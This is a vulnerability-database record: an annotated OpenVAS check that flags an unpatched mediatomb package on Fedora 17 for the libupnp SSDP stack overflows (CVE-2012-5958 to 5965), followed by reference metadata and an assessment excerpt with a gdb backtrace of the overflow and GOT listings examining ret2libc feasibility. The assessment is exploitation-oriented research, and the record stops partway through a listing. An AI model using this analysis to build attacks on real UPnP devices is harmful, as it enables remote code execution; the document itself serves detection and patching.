ID OPENVAS:1361412562310865372 Type openvas Reporter Copyright (c) 2013 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the 'mediatomb' package(s) announced via the referenced advisory.
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for mediatomb FEDORA-2013-2352
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Metadata block: taken only when the scanner evaluates the script with
# `description` set. It registers identity, references, scoring and
# scheduling data and then exits, so the package check further down is not
# reached on this path.
if(description)
{
# Upstream Fedora package-announce post for this update (plain-http link as published).
script_xref(name:"URL", value:"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099069.html");
# Unique object identifier of this check.
script_oid("1.3.6.1.4.1.25623.1.0.865372");
script_version("$Revision: 14223 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2013-02-22 09:59:19 +0530 (Fri, 22 Feb 2013)");
# CVE-2012-5958 through CVE-2012-5965: the libupnp SSDP request-parsing
# stack overflows. NOTE(review): the script does not say how mediatomb is
# affected (presumably through the UPnP code it builds against); confirm
# against the advisory.
script_cve_id("CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5961", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965");
# CVSS v2 base score and vector: network-reachable, low complexity, no
# authentication, complete impact on confidentiality, integrity and
# availability. This is a fixed value attached to the check, not something
# measured on the scanned host.
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
# Fedora advisory identifier.
script_xref(name:"FEDORA", value:"2013-2352");
script_name("Fedora Update for mediatomb FEDORA-2013-2352");
script_tag(name:"summary", value:"The remote host is missing an update for the 'mediatomb'
package(s) announced via the referenced advisory.");
# Information-gathering category: the check reads data and reports.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
# Needs the package list collected by gather-package-list.nasl.
script_dependencies("gather-package-list.nasl");
# Scheduling gate: the check is run only when these knowledge-base keys
# exist and the release key matches FC17.
# NOTE(review): the key names suggest they are filled in after an
# authenticated SSH login; if so, a scan without working SSH credentials
# skips this check, and "no finding" must not be read as "patched".
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC17");
script_tag(name:"affected", value:"mediatomb on Fedora 17");
script_tag(name:"solution", value:"Please install the updated package(s).");
# The result is derived from the installed package version, not from
# probing the running service.
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
# Leave here: registration must not fall through into the check itself.
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
# Detection logic: compare the installed mediatomb rpm with the fixed build
# named by the advisory and report when the host is behind.
#
# Caveat for readers of the result: this is a package-version comparison
# only. It does not show whether a running mediatomb process was restarted
# after the update, nor whether the service is reachable from the network.

# Release string of the scanned host; stop quietly when it is unknown.
release = rpm_get_ssh_release();
if(!release) {
  exit(0);
}

res = "";

# Only Fedora 17 hosts are evaluated by this check.
if(release == "FC17") {
  # NOTE(review): isrpmvuln comes from pkg-lib-rpm.inc; presumably it returns
  # report text when the installed rpm is older than the given build and
  # NULL otherwise. Verify against the library.
  res = isrpmvuln(pkg:"mediatomb", rpm:"mediatomb~0.12.1~23.fc17", rls:"FC17");
  if(res != NULL) {
    # Installed build predates the fix: raise the finding and stop.
    security_message(data:res);
    exit(0);
  }

  # NOTE(review): __pkg_match is not set in this file; presumably the rpm
  # library sets it when the package was found installed, and exit code 99
  # then marks the host as checked and not affected. Confirm.
  if(__pkg_match) {
    exit(99);
  }
  exit(0);
}
{"id": "OPENVAS:1361412562310865372", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for mediatomb FEDORA-2013-2352", "description": "The remote host is missing an update for the ", "published": "2013-02-22T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865372", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["2013-2352", "http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099069.html"], "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "lastseen": "2019-05-29T18:38:27", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:8F0E9A23-04D0-42B5-9735-9BC6A4D70879"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2615-1:87BCB", "DEBIAN:DSA-2614-1:2F670"]}, {"type": "cisco", "idList": ["CISCO-SA-20130129-UPNP"]}, {"type": "cert", "idList": ["VU:922681"]}, {"type": "freebsd", "idList": ["2EA6CE3D-6AFD-11E2-9D4E-BCAEC524BF84"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12852"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2615.NASL", "DEBIAN_DSA-2614.NASL", "FEDORA_2013-2377.NASL", "FREEBSD_PKG_2EA6CE3D6AFD11E29D4EBCAEC524BF84.NASL", "MANDRIVA_MDVSA-2013-098.NASL", "FEDORA_2013-1713.NASL", "FEDORA_2013-1765.NASL", "FEDORA_2013-2352.NASL", "FEDORA_2013-1734.NASL", "OPENSUSE-2013-90.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892615", "OPENVAS:892614", "OPENVAS:865371", "OPENVAS:1361412562310865353", "OPENVAS:1361412562310865345", "OPENVAS:1361412562310105882", "OPENVAS:865353", "OPENVAS:865372", "OPENVAS:865345", "OPENVAS:1361412562310865371"]}, {"type": "fedora", "idList": ["FEDORA:02152208BF", "FEDORA:7AED420F62", "FEDORA:4ECCF20F1C", "FEDORA:4299220A19", "FEDORA:8CF1320B49"]}, {"type": "exploitdb", 
"idList": ["EDB-ID:49119", "EDB-ID:24455"]}, {"type": "cve", "idList": ["CVE-2012-5963", "CVE-2012-5961", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5964", "CVE-2012-5959", "CVE-2013-2352", "CVE-2012-5965", "CVE-2012-5958"]}, {"type": "gentoo", "idList": ["GLSA-201403-06"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/UPNP/SSDP_MSEARCH", "MSF:EXPLOIT/MULTI/UPNP/LIBUPNP_SSDP_OVERFLOW"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160242"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}], "modified": "2019-05-29T18:38:27", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-05-29T18:38:27", "rev": 2}, "vulnersScore": 7.6}, "pluginID": "1361412562310865372", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediatomb FEDORA-2013-2352\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099069.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865372\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:19 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-2352\");\n script_name(\"Fedora Update for mediatomb FEDORA-2013-2352\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediatomb'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mediatomb on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediatomb\", rpm:\"mediatomb~0.12.1~23.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks", "immutableFields": []}
{"attackerkb": [{"lastseen": "2020-11-15T18:45:25", "bulletinFamily": "info", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5961", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a UDP packet with a crafted string that is not properly handled after a certain pointer subtraction.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n * How unique_service_name is reached?00 \n\n \n \n Breakpoint 4, unique_service_name (\n cmd=0x8053ad8 \"uuid:schemas:device:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"..., Evt=0xb57e6ca4) at src/ssdp/ssdp_server.c:496\n 496\t printf(\"[*] unique_service_name()\\n\");\n (gdb) bt\n #0 unique_service_name (\n cmd=0x8053ad8 \"uuid:schemas:device:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"..., Evt=0xb57e6ca4) at src/ssdp/ssdp_server.c:496\n #1 0x0013464a in ssdp_request_type (\n cmd=0x8053ad8 \"uuid:schemas:device:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"..., Evt=0xb57e7260) at src/ssdp/ssdp_server.c:624\n #2 0x001326c9 in ssdp_handle_device_request (hmsg=0x8051bb0, dest_addr=0x8051c8c) at src/ssdp/ssdp_device.c:127\n #3 0x001341e8 in ssdp_event_handler_thread (the_data=0x8051bb0) at src/ssdp/ssdp_server.c:787\n #4 0x0015f306 in WorkerThread (arg=0x15b340) at 
src/ThreadPool.c:533\n #5 0x0017596e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0\n #6 0x00256a4e in clone () from /lib/tls/i686/cmov/libc.so.6\n \n\n * CVE-2012-5958 \n\n\nTempBuf Overflowed, at the current stack frame\n\n * CVE-2012-5959, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963, CVE-2012-5964, CVE-2012-5965, CVE-2012-5960 \n\n\nEvt members overflowed. Evt stored at the ssdp_handle_device_request frame:\n \n \n ssdp_handle_device_request( IN http_message_t * hmsg, IN struct sockaddr_in *dest_addr )\n \n int handle;\n struct Handle_Info *dev_info = NULL;\n memptr hdr_value;\n int mx;\n char save_char;\n SsdpEvent event; <==\n int ret_code;\n SsdpSearchReply *threadArg = NULL;\n ThreadPoolJob job;\n int replyTime;\n int maxAge;\n \n\n * CVE-2012-5958, assuming no PIE for the main executable, which has been found in the wild, having into account \nwhich goodchars are from 0x01-0x7f or 0x80-0xff (with exceptions), doesn\u2019t seem feasible to use any of these \naddresses to make a type of ret2libc: \n\n\n(1) .got.plt for upnp_tv_device, the check program linked with libupnp (compiled on ubuntu 10.04 with \ngcc flags to disable stack-cookies and fortify libc checks)\n \n \n .got.plt:0804F000 off_804F000 dd offset UpnpInit ; DATA XREF: _UpnpInitr\n .got.plt:0804F004 off_804F004 dd offset sigemptyset ; DATA XREF: _sigemptysetr\n .got.plt:0804F008 off_804F008 dd offset UpnpSendAdvertisement\n .got.plt:0804F008 ; DATA XREF: _UpnpSendAdvertisementr\n .got.plt:0804F00C off_804F00C dd offset sprintf ; DATA XREF: _sprintfr\n .got.plt:0804F010 off_804F010 dd offset ixmlPrintNode ; DATA XREF: _ixmlPrintNoder\n .got.plt:0804F014 off_804F014 dd offset ixmlNode_getNodeType\n .got.plt:0804F014 ; DATA XREF: _ixmlNode_getNodeTyper\n .got.plt:0804F018 off_804F018 dd offset __gmon_start__ ; DATA XREF: ___gmon_start__r\n .got.plt:0804F01C off_804F01C dd offset __isoc99_sscanf ; DATA XREF: ___isoc99_sscanfr\n .got.plt:0804F020 off_804F020 dd offset 
UpnpUnRegisterRootDevice\n .got.plt:0804F020 ; DATA XREF: _UpnpUnRegisterRootDevicer\n .got.plt:0804F024 off_804F024 dd offset vsnprintf ; DATA XREF: _vsnprintfr\n .got.plt:0804F028 off_804F028 dd offset ixmlNode_getFirstChild\n .got.plt:0804F028 ; DATA XREF: _ixmlNode_getFirstChildr\n .got.plt:0804F02C off_804F02C dd offset fgets ; DATA XREF: _fgetsr\n .got.plt:0804F030 off_804F030 dd offset ixmlNode_getNodeValue\n .got.plt:0804F030 ; DATA XREF: _ixmlNode_getNodeValuer\n .got.plt:0804F034 off_804F034 dd offset __libc_start_main\n .got.plt:0804F034 ; DATA XREF: ___libc_start_mainr\n .got.plt:0804F038 off_804F038 dd offset UpnpAddToActionResponse\n .got.plt:0804F038 ; DATA XREF: _UpnpAddToActionResponser\n .got.plt:0804F03C off_804F03C dd offset ixmlNodeList_length\n .got.plt:0804F03C ; DATA XREF: _ixmlNodeList_lengthr\n .got.plt:0804F040 off_804F040 dd offset UpnpGetServerIpAddress\n .got.plt:0804F040 ; DATA XREF: _UpnpGetServerIpAddressr\n .got.plt:0804F044 off_804F044 dd offset __assert_fail ; DATA XREF: ___assert_failr\n .got.plt:0804F048 off_804F048 dd offset pthread_mutexattr_setkind_np\n .got.plt:0804F048 ; DATA XREF: _pthread_mutexattr_setkind_npr\n .got.plt:0804F04C off_804F04C dd offset UpnpAcceptSubscription\n .got.plt:0804F04C ; DATA XREF: _UpnpAcceptSubscriptionr\n .got.plt:0804F050 off_804F050 dd offset UpnpResolveURL ; DATA XREF: _UpnpResolveURLr\n .got.plt:0804F054 off_804F054 dd offset sigwait ; DATA XREF: _sigwaitr\n .got.plt:0804F058 off_804F058 dd offset strtol ; DATA XREF: _strtolr\n .got.plt:0804F05C off_804F05C dd offset free ; DATA XREF: _freer\n .got.plt:0804F060 off_804F060 dd offset ixmlCloneDOMString\n .got.plt:0804F060 ; DATA XREF: _ixmlCloneDOMStringr\n .got.plt:0804F064 off_804F064 dd offset pthread_mutex_unlock\n .got.plt:0804F064 ; DATA XREF: _pthread_mutex_unlockr\n .got.plt:0804F068 off_804F068 dd offset UpnpGetServerPort\n .got.plt:0804F068 ; DATA XREF: _UpnpGetServerPortr\n .got.plt:0804F06C off_804F06C dd offset 
pthread_mutexattr_destroy\n .got.plt:0804F06C ; DATA XREF: _pthread_mutexattr_destroyr\n .got.plt:0804F070 off_804F070 dd offset ixmlNodeList_free\n .got.plt:0804F070 ; DATA XREF: _ixmlNodeList_freer\n .got.plt:0804F074 off_804F074 dd offset ixmlDocument_free\n .got.plt:0804F074 ; DATA XREF: _ixmlDocument_freer\n .got.plt:0804F078 off_804F078 dd offset strlen ; DATA XREF: _strlenr\n .got.plt:0804F07C off_804F07C dd offset pthread_mutex_destroy\n .got.plt:0804F07C ; DATA XREF: _pthread_mutex_destroyr\n .got.plt:0804F080 off_804F080 dd offset strcpy ; DATA XREF: _strcpyr\n .got.plt:0804F084 off_804F084 dd offset printf ; DATA XREF: _printfr\n .got.plt:0804F088 off_804F088 dd offset pthread_mutex_init\n .got.plt:0804F088 ; DATA XREF: _pthread_mutex_initr\n .got.plt:0804F08C off_804F08C dd offset strcasecmp ; DATA XREF: _strcasecmpr\n .got.plt:0804F090 off_804F090 dd offset malloc ; DATA XREF: _mallocr\n .got.plt:0804F094 off_804F094 dd offset pthread_mutex_lock\n .got.plt:0804F094 ; DATA XREF: _pthread_mutex_lockr\n .got.plt:0804F098 off_804F098 dd offset UpnpDownloadXmlDoc\n .got.plt:0804F098 ; DATA XREF: _UpnpDownloadXmlDocr\n .got.plt:0804F09C off_804F09C dd offset UpnpSetWebServerRootDir\n .got.plt:0804F09C ; DATA XREF: _UpnpSetWebServerRootDirr\n .got.plt:0804F0A0 off_804F0A0 dd offset pthread_create ; DATA XREF: _pthread_creater\n .got.plt:0804F0A4 off_804F0A4 dd offset sigaddset ; DATA XREF: _sigaddsetr\n .got.plt:0804F0A8 off_804F0A8 dd offset ixmlElement_getElementsByTagName\n .got.plt:0804F0A8 ; DATA XREF: _ixmlElement_getElementsByTagNamer\n .got.plt:0804F0AC off_804F0AC dd offset UpnpFinish ; DATA XREF: _UpnpFinishr\n .got.plt:0804F0B0 off_804F0B0 dd offset UpnpRegisterRootDevice\n .got.plt:0804F0B0 ; DATA XREF: _UpnpRegisterRootDevicer\n .got.plt:0804F0B4 off_804F0B4 dd offset UpnpNotify ; DATA XREF: _UpnpNotifyr\n .got.plt:0804F0B8 off_804F0B8 dd offset ixmlNodeList_item\n .got.plt:0804F0B8 ; DATA XREF: _ixmlNodeList_itemr\n .got.plt:0804F0BC off_804F0BC 
dd offset snprintf ; DATA XREF: _snprintfr\n .got.plt:0804F0C0 off_804F0C0 dd offset pthread_mutexattr_init\n .got.plt:0804F0C0 ; DATA XREF: _pthread_mutexattr_initr\n .got.plt:0804F0C4 off_804F0C4 dd offset strcmp ; DATA XREF: _strcmpr\n .got.plt:0804F0C8 off_804F0C8 dd offset __strdup ; DATA XREF: ___strdupr\n .got.plt:0804F0CC off_804F0CC dd offset exit ; DATA XREF: _exitr\n .got.plt:0804F0D0 off_804F0D0 dd offset ixmlFreeDOMString\n .got.plt:0804F0D0 ; DATA XREF: _ixmlFreeDOMStringr\n .got.plt:0804F0D4 off_804F0D4 dd offset ixmlDocument_getElementsByTagName\n .got.plt:0804F0D4 ; DATA XREF: _ixmlDocument_getElementsByTagNamer\n .got.plt:0804F0D4 _got_plt ends\n .got.plt:0804F0D4\n \n\n * For the dms executable \n\n \n \n .got.plt:080BA208 off_80BA208 dd offset __cxa_end_catch ; DATA XREF: ___cxa_end_catchr\n .got.plt:080BA20C off_80BA20C dd offset __cxa_rethrow ; DATA XREF: ___cxa_rethrowr\n .got.plt:080BA210 off_80BA210 dd offset _ZN11MediaServer15GetAbsolutePathERKSs\n .got.plt:080BA210 ; DATA XREF: MediaServer::GetAbsolutePath(std::string const&)r\n .got.plt:080BA210 ; MediaServer::GetAbsolutePath(std::string const&)\n .got.plt:080BA214 off_80BA214 dd offset _ZN14SynoAudioUtils25RadioGetGenreStationCountEj\n .got.plt:080BA214 ; DATA XREF: SynoAudioUtils::RadioGetGenreStationCount(uint)r\n .got.plt:080BA214 ; SynoAudioUtils::RadioGetGenreStationCount(uint)\n .got.plt:080BA218 off_80BA218 dd offset UpnpInit ; DATA XREF: _UpnpInitr\n .got.plt:080BA21C off_80BA21C dd offset UpnpSetVirtualDirCallbacks\n .got.plt:080BA21C ; DATA XREF: _UpnpSetVirtualDirCallbacksr\n .got.plt:080BA220 off_80BA220 dd offset mkdir ; DATA XREF: _mkdirr\n .got.plt:080BA224 off_80BA224 dd offset pthread_getspecific\n .got.plt:080BA224 ; DATA XREF: _pthread_getspecificr\n .got.plt:080BA228 off_80BA228 dd offset _ZN11MediaServer7MediaDB12AddConditionERKSs\n .got.plt:080BA228 ; DATA XREF: MediaServer::MediaDB::AddCondition(std::string const&)r\n .got.plt:080BA228 ; 
MediaServer::MediaDB::AddCondition(std::string const&)\n .got.plt:080BA22C off_80BA22C dd offset _ZN11MediaServer15DMSStringBundle9TranslateERKSs\n .got.plt:080BA22C ; DATA XREF: MediaServer::DMSStringBundle::Translate(std::string const&)r\n .got.plt:080BA22C ; MediaServer::DMSStringBundle::Translate(std::string const&)\n .got.plt:080BA230 off_80BA230 dd offset ixmlNode_getFirstChild\n .got.plt:080BA230 ; DATA XREF: _ixmlNode_getFirstChildr\n .got.plt:080BA234 off_80BA234 dd offset _ZN11MediaServer7MediaDB10FetchFieldEPKc\n .got.plt:080BA234 ; DATA XREF: MediaServer::MediaDB::FetchField(char const*)r\n .got.plt:080BA234 ; MediaServer::MediaDB::FetchField(char const*)\n .got.plt:080BA238 off_80BA238 dd offset _ZN11MediaServer18DMSGetThumbnailResEiiPiS0_i\n .got.plt:080BA238 ; DATA XREF: MediaServer::DMSGetThumbnailRes(int,int,int *,int *,int)r\n .got.plt:080BA238 ; MediaServer::DMSGetThumbnailRes(int,int,int *,int *,int)\n .got.plt:080BA23C off_80BA23C dd offset _ZNSt8ios_base4InitC1Ev\n .got.plt:080BA23C ; DATA XREF: std::ios_base::Init::Init(void)r\n .got.plt:080BA23C ; std::ios_base::Init::Init(void)\n .got.plt:080BA240 off_80BA240 dd offset strchr ; DATA XREF: _strchrr\n .got.plt:080BA244 off_80BA244 dd offset _ZN11MediaServer21XMLGetElmentTextValueEP10_IXML_Node\n .got.plt:080BA244 ; DATA XREF: MediaServer::XMLGetElmentTextValue(_IXML_Node *)r\n .got.plt:080BA244 ; MediaServer::XMLGetElmentTextValue(_IXML_Node *)\n .got.plt:080BA248 off_80BA248 dd offset _ZN11MediaServer19DMSGetProductSerialEv\n .got.plt:080BA248 ; DATA XREF: MediaServer::DMSGetProductSerial(void)r\n .got.plt:080BA248 ; MediaServer::DMSGetProductSerial(void)\n .got.plt:080BA24C off_80BA24C dd offset _ZN4Json18StyledStreamWriterC1ESs\n .got.plt:080BA24C ; DATA XREF: Json::StyledStreamWriter::StyledStreamWriter(std::string)r\n .got.plt:080BA24C ; Json::StyledStreamWriter::StyledStreamWriter(std::string)\n .got.plt:080BA250 off_80BA250 dd offset _ZNKSs13find_first_ofEPKcjj\n .got.plt:080BA250 ; 
DATA XREF: std::string::find_first_of(char const*,uint,uint)r\n .got.plt:080BA250 ; std::string::find_first_of(char const*,uint,uint)\n .got.plt:080BA254 off_80BA254 dd offset _ZN14SynoAudioUtils17RadioGetGenreDataEjRNS_10RadioGenreE\n .got.plt:080BA254 ; DATA XREF: SynoAudioUtils::RadioGetGenreData(uint,SynoAudioUtils::RadioGenre &)r\n .got.plt:080BA254 ; SynoAudioUtils::RadioGetGenreData(uint,SynoAudioUtils::RadioGenre &)\n .got.plt:080BA258 off_80BA258 dd offset _ZN4Json5ValueC1ENS_9ValueTypeE\n .got.plt:080BA258 ; DATA XREF: Json::Value::Value(Json::ValueType)r\n .got.plt:080BA258 ; Json::Value::Value(Json::ValueType)\n .got.plt:080BA25C off_80BA25C dd offset _ZNSt6localeD1Ev\n .got.plt:080BA25C ; DATA XREF: std::locale::~locale()r\n .got.plt:080BA25C ; std::locale::~locale()\n .got.plt:080BA260 off_80BA260 dd offset getopt_long_only ; DATA XREF: _getopt_long_onlyr\n .got.plt:080BA264 off_80BA264 dd offset _ZNKSs5rfindEPKcjj\n .got.plt:080BA264 ; DATA XREF: std::string::rfind(char const*,uint,uint)r\n .got.plt:080BA264 ; std::string::rfind(char const*,uint,uint)\n .got.plt:080BA268 off_80BA268 dd offset getpid ; DATA XREF: _getpidr\n .got.plt:080BA26C off_80BA26C dd offset _ZN7pcrecpp2RE4InitERKSsPKNS_10RE_OptionsE\n .got.plt:080BA26C ; DATA XREF: pcrecpp::RE::Init(std::string const&,pcrecpp::RE_Options const*)r\n .got.plt:080BA26C ; pcrecpp::RE::Init(std::string const&,pcrecpp::RE_Options const*)\n .got.plt:080BA270 off_80BA270 dd offset strdup ; DATA XREF: _strdupr\n .got.plt:080BA274 off_80BA274 dd offset appendPQExpBuffer\n .got.plt:080BA274 ; DATA XREF: _appendPQExpBufferr\n .got.plt:080BA278 off_80BA278 dd offset _ZN11MediaServer15DMSStringBundleC1ERKSs\n .got.plt:080BA278 ; DATA XREF: MediaServer::DMSStringBundle::DMSStringBundle(std::string const&)r\n .got.plt:080BA278 ; MediaServer::DMSStringBundle::DMSStringBundle(std::string const&)\n .got.plt:080BA27C off_80BA27C dd offset _ZN11MediaServer13DMSClientList4LoadERKSsS2_\n .got.plt:080BA27C ; DATA XREF: 
MediaServer::DMSClientList::Load(std::string const&,std::string const&)r\n .got.plt:080BA27C ; MediaServer::DMSClientList::Load(std::string const&,std::string const&)\n .got.plt:080BA280 off_80BA280 dd offset SYNODlnaContainerTypeGet\n .got.plt:080BA280 ; DATA XREF: _SYNODlnaContainerTypeGetr\n .got.plt:080BA284 off_80BA284 dd offset UpnpRegisterClient\n .got.plt:080BA284 ; DATA XREF: _UpnpRegisterClientr\n .got.plt:080BA288 off_80BA288 dd offset UpnpSearchAsync ; DATA XREF: _UpnpSearchAsyncr\n .got.plt:080BA28C off_80BA28C dd offset write ; DATA XREF: _writer\n .got.plt:080BA290 off_80BA290 dd offset strcmp ; DATA XREF: _strcmpr\n .got.plt:080BA294 off_80BA294 dd offset _ZN14SynoAudioUtils15SmartPLSGetNameEi\n .got.plt:080BA294 ; DATA XREF: SynoAudioUtils::SmartPLSGetName(int)r\n .got.plt:080BA294 ; SynoAudioUtils::SmartPLSGetName(int)\n .got.plt:080BA298 off_80BA298 dd offset _ZNSt8ios_baseC2Ev\n .got.plt:080BA298 ; DATA XREF: std::ios_base::ios_base(void)r\n .got.plt:080BA298 ; std::ios_base::ios_base(void)\n .got.plt:080BA29C off_80BA29C dd offset _ZN11MediaServer13DMSClientList11EraseObjectERKSs\n .got.plt:080BA29C ; DATA XREF: MediaServer::DMSClientList::EraseObject(std::string const&)r\n .got.plt:080BA29C ; MediaServer::DMSClientList::EraseObject(std::string const&)\n .got.plt:080BA2A0 off_80BA2A0 dd offset close ; DATA XREF: _closer\n .got.plt:080BA2A4 off_80BA2A4 dd offset SYNODBClose ; DATA XREF: destr_function:_SYNODBCloser\n .got.plt:080BA2A8 off_80BA2A8 dd offset _ZNSt13basic_filebufIcSt11char_traitsIcEE5closeEv\n .got.plt:080BA2A8 ; DATA XREF: std::basic_filebuf<char,std::char_traits<char>>::close(void)r\n .got.plt:080BA2A8 ; std::basic_filebuf<char,std::char_traits<char>>::close(void)\n .got.plt:080BA2AC off_80BA2AC dd offset _ZN14SynoAudioUtils18RadioGetGenreCountEv\n .got.plt:080BA2AC ; DATA XREF: SynoAudioUtils::RadioGetGenreCount(void)r\n .got.plt:080BA2AC ; SynoAudioUtils::RadioGetGenreCount(void)\n .got.plt:080BA2B0 off_80BA2B0 dd offset 
